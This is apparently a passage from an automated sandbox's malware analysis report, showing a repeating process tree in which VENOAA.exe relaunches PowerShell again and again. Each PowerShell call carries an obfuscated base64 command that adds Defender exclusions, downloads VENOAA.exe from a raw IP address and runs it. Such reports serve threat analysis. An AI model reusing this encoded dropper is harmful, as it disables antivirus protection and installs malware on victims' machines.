"PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="32⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"33⤵
- Checks computer location settings
- Executes dropped EXE
PID:4980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="34⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"35⤵
- Checks computer location settings
- Executes dropped EXE
PID:4452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="36⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"37⤵
- Executes dropped EXE
PID:896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="38⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"39⤵
- Checks computer location settings
- Executes dropped EXE
PID:3956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="40⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"41⤵
- Executes dropped EXE
PID:4008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="42⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"43⤵
- Executes dropped EXE
PID:2192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="44⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV145⤵PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"45⤵
- Checks computer location settings
- Executes dropped EXE
PID:1852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="46⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"47⤵
- Checks computer location settings
- Executes dropped EXE
PID:4736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="48⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"49⤵
- Checks computer location settings
- Executes dropped EXE
PID:3200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="50⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"51⤵
- Checks computer location settings
- Executes dropped EXE
PID:4912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="52⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"53⤵
- Executes dropped EXE
PID:2588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="54⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"55⤵
- Checks computer location settings
- Executes dropped EXE
PID:4620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAg